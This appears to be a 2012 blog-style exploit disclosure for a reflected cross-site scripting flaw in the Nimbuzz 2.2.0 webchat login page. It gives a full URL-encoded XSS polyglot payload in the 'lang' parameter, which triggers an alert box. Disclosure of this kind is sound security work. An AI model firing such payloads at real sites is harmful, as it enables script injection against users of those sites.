# Exploit Title: Nimbuzz 2.2.0 Cross Site Scripting # Date: 09.04.2012 # Author: Sony # Software Link: http://www.nimbuzz.com/en/get/voip-and-chat-on-pc/pc-client-downloaded # Software Version: 2.2.0 # Web Browser : Mozilla Firefox # Blog : http://st2tea.blogspot.com # PoC: http://st2tea.blogspot.com/2012/04/nimbuzz-220-cross-site-scripting.html ..................................................................
Well, we have xss in the messenger, interesting place for xss)
And where is forget password:
http://www.nimbuzz.com/webchat_login?lang=en&step=2&login=error http://www.nimbuzz.com/webchat_login?lang=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
0 comentarii:
Trimiteți un comentariu
Rețineți: Numai membrii acestui blog pot posta comentarii.